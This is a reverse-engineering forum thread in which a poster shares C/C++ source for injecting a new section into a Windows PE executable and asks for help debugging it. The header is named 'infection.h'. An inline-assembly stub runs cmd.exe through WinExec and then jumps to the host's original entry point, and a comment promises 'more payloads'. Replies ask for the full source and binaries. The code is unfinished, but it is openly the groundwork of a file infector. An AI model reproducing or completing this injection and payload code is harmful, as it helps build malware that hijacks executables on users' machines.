Jump to content
Tuts 4 You

Problem with PE section Injection


DarkInjection

Recommended Posts

DarkInjection
Posted

hello this is my first post here :)

i m writing a program to add a new section into the PE at the moment....

but somegthing goes wrong im trying to locate what its worng but nothing yet

u can find the source here:

infection.h

typedef struct _StaffToUse
{
DWORD EIP;
DWORD IMAGE_BASE;
DWORD VEP; DWORD NumbOfSections;
DWORD WinExec_;
DWORD LoadLib_;
DWORD ExitProc_;
DWORD *VirtualS[32];
DWORD *SizeOfRaw[32];
DWORD *PointerToRaw[32];
DWORD *VirtualAddr[32];
BYTE *SectionNames[32];} StaffToUse;typedef struct _DWDataStorage{ BYTE *dwData;}DWDataStorage;//cracps
HANDLE hFile,oFile = NULL;
DWORD dwBytesRead;
DWORD Sections;
DWORD fSize = 0;
PCHAR pMem;
IMAGE_NT_HEADERS _nt;
DWDataStorage dw_[32];
IMAGE_DOS_HEADER header;
IMAGE_SECTION_HEADER *_img;
IMAGE_SECTION_HEADER _img_[32];
StaffToUse _help_my_ass;
PIMAGE_SECTION_HEADER Custom_hdr;
BYTE *ptrBuffer;
DWORD stub_size;
BYTE *stub;

//

main.cpp

//

#include <stdio.h>
#include <windows.h>
#include "infection.h"//yodap code .......................................................
DWORD PEAlign(DWORD dwTarNum,DWORD dwAlignTo){ return(((dwTarNum+dwAlignTo-1)/dwAlignTo)*dwAlignTo);
}
//...................................................................void CmdLoader(){
//cmd shell
__asm{ pushad
pushfd xor eax, eax
xor ecx, ecx mov dword ptr[ebp-15],0x63
mov dword ptr[ebp-14],0x6d
mov dword ptr[ebp-13],0x64
mov dword ptr[ebp-12],0x2e
mov dword ptr[ebp-11],0x65
mov dword ptr[ebp-10],0x78
mov dword ptr[ebp-9],0x65
mov dword ptr[ebp-8],0x00 push 0x1
lea eax, [ebp-15]
push eax
mov ecx, _help_my_ass.WinExec_
call ecx mov eax, _help_my_ass.VEP jmp eax }; //soon more payloads.... //....................
}void AddNewSection(char* szName,DWORD dwSize)
{
DWORD roffset,rsize,voffset,vsize; int i=_nt.FileHeader.NumberOfSections;
//yodap code............................................................................
................
rsize=PEAlign(dwSize,_nt.OptionalHeader.FileAlignment); vsize=PEAlign(rsize,_nt.OptionalHeader.SectionAlignment); roffset=PEAlign(_img_[i-1].PointerToRawData+_img_[i-1].SizeOfRawData,_nt.OptionalHeader.FileAlignment); voffset=PEAlign(_img_[i-1].VirtualAddress+_img_[i-1].Misc.VirtualSize,_nt.OptionalHeader.SectionAlignment);
//------------------------------------------------------------------------------------------------------- _img_[i].PointerToRawData=roffset;
_img_[i].VirtualAddress=voffset;
_img_[i].SizeOfRawData=rsize;
_img_[i].Misc.VirtualSize=vsize;
_img_[i].Characteristics=0xC0000040; memcpy(_img_[i].Name,szName,(size_t)strlen(szName)); _nt.FileHeader.NumberOfSections++; //memcpy(&Custom_hdr,&_img_[i],sizeof(_img_[i]));}int readFileHeaders(char*file){ hFile = CreateFile( file,GENERIC_READ,FILE_SHARE_WRITE | FILE_SHARE_READ,NULL,OPEN_EXISTING,FILE_ATTRIBUTE_NORMAL,NULL); if(hFile == INVALID_HANDLE_VALUE){ MessageBoxA(0,"File Not Found","Error",MB_ICONEXCLAMATION|MB_OK);
return 0; } fSize = GetFileSize(hFile,NULL); if(fSize <= 60 ){
MessageBoxA(0,"File Size Error","Error",MB_ICONEXCLAMATION|MB_OK); return 0; }else{ ptrBuffer = (BYTE*)malloc(fSize+1); } //read the file
ReadFile( hFile, ptrBuffer, fSize, &dwBytesRead, NULL ); if(dwBytesRead != fSize){ MessageBoxA(0,"Read Size Error","Error",MB_ICONEXCLAMATION|MB_OK); return 0; } //copy the dos header
memcpy(&header, ptrBuffer, sizeof(IMAGE_DOS_HEADER)); stub_size = header.e_lfanew - sizeof(IMAGE_DOS_HEADER); stub = (BYTE*)malloc(stub_size); memcpy(stub,ptrBuffer+ sizeof(IMAGE_DOS_HEADER),stub_size); if(header.e_magic != IMAGE_DOS_SIGNATURE){ MessageBoxA(0,"Not A Valid Dos Stub","Error",MB_ICONEXCLAMATION|MB_OK); return 0; };
//copy the pe header
memcpy(&_nt,ptrBuffer + header.e_lfanew,sizeof(IMAGE_NT_HEADERS)); if(_nt.Signature != IMAGE_NT_SIGNATURE){ MessageBoxA(0,"Not A Valid PE Executable","Error",MB_ICONEXCLAMATION|MB_OK); return 0;
}
//place **** to my structure
_help_my_ass.EIP = _nt.OptionalHeader.AddressOfEntryPoint;
_help_my_ass.IMAGE_BASE = _nt.OptionalHeader.ImageBase;
_help_my_ass.VEP = _nt.OptionalHeader.AddressOfEntryPoint + _nt.OptionalHeader.ImageBase;
//read the sections
Sections = _nt.FileHeader.NumberOfSections;
_help_my_ass.NumbOfSections = Sections;
//fill the image section structure
_img = (IMAGE_SECTION_HEADER *)(ptrBuffer + header.e_lfanew+sizeof(IMAGE_NT_HEADERS)); if( (Sections < 1) || (Sections > 32) ){ MessageBoxA(0,"Error With File Sections","Error",MB_ICONEXCLAMATION|MB_OK); return 0; } for(DWORD i=0; i<= Sections-1; i++){ memcpy(&_img_[i],_img,sizeof(IMAGE_SECTION_HEADER));
_help_my_ass.SectionNames[i] = _img_[i].Name;
_help_my_ass.PointerToRaw[i] = (unsigned long*)_img_[i].PointerToRawData;
_help_my_ass.SizeOfRaw[i] = (unsigned long*)_img_[i].SizeOfRawData;
_help_my_ass.VirtualAddr[i] = (unsigned long*)_img_[i].VirtualAddress;
_help_my_ass.VirtualS[i] =(unsigned long*) _img_[i].Misc.VirtualSize;
//allocate memory to store the datas from each section
DWORD size_to = PEAlign(_img_[i].SizeOfRawData,_nt.OptionalHeader.FileAlignment);
dw_[i].dwData = (BYTE*)malloc(size_to);
//copy them
memcpy(dw_[i].dwData,ptrBuffer+_img_[i].PointerToRawData,_img_[i].SizeOfRawData);
_img++;
} return 1;
}int main(){
char *_file = "c:\\windows\\system32\\cmd.exe";
DWORD i; _help_my_ass.WinExec_ = (unsigned long)GetProcAddress(LoadLibrary("KERNEL32.DLL"),"WinExec");
_help_my_ass.LoadLib_ = (unsigned long)GetProcAddress(LoadLibrary("KERNEL32.DLL"),"LoadLibrary");
_help_my_ass.ExitProc_ = (unsigned long)GetProcAddress(LoadLibrary("KERNEL32.DLL"),"ExitProcess"); readFileHeaders(_file); printf("Current EIP :%x\n",_help_my_ass.EIP); //_nt.OptionalHeader.AddressOfEntryPoint = 0x01ffff; pMem = (char*)malloc(fSize); memcpy(pMem,&header,sizeof(IMAGE_DOS_HEADER)); oFile = CreateFile("output.exe",
GENERIC_WRITE,
FILE_SHARE_WRITE | FILE_SHARE_READ,
NULL,CREATE_ALWAYS,FILE_ATTRIBUTE_NORMAL,NULL); //write the DOS HEADER
WriteFile(oFile,pMem,sizeof(IMAGE_DOS_HEADER),&dwBytesRead,NULL);
//write the stub junk****
WriteFile(oFile,stub,stub_size,&dwBytesRead,NULL);
//Make New Section
AddNewSection(".injct",0x22400);
//Write NT HEADER
memcpy(pMem,&_nt,sizeof(IMAGE_NT_HEADERS));
WriteFile(oFile,pMem,sizeof(IMAGE_NT_HEADERS),&dwBytesRead,NULL); //write the sections
for(i=0; i<=Sections;i++){ memcpy(pMem,&_img_[i],sizeof(IMAGE_SECTION_HEADER));
WriteFile(oFile,pMem,sizeof(IMAGE_SECTION_HEADER),&dwBytesRead,NULL);
}
//write sections data for(i=0; i<=Sections-1; i++){
memcpy(pMem,dw_[i].dwData,_img_[i].SizeOfRawData); WriteFile(oFile,pMem,_img_[i].SizeOfRawData,&dwBytesRead,NULL); } //write data for the new section later return 0;
}

that source generates a wrong executable file instead of make a correct one

any help will be gr8full :)

DarkInjection
Posted

anyway i fix that :)

  • 2 weeks later...
Posted

Can you attach a before and after exe to compare?

Posted

Hi.

Looking at this purely from a coders perspective, if someone came looking for help with adding a section to a PE file and their problem has a similar cause/effect, they might benefit from the information you can provide about why your code was wrong and how you fixed it.

Plus its only fair (imho) that when you are prepared to ask for help with a coding/rce situation, you should also be prepared to help if you can and sometimes this is as simple as sharing the fix to your woes.

HR.

Ghandi

Guest GI4C4T
Posted

Hi, can you post full source here?

Thanks

Create an account or sign in to comment

You need to be a member in order to leave a comment

Create an account

Sign up for a new account in our community. It's easy!

Register a new account

Sign in

Already have an account? Sign in here.

Sign In Now
×
×
  • Create New...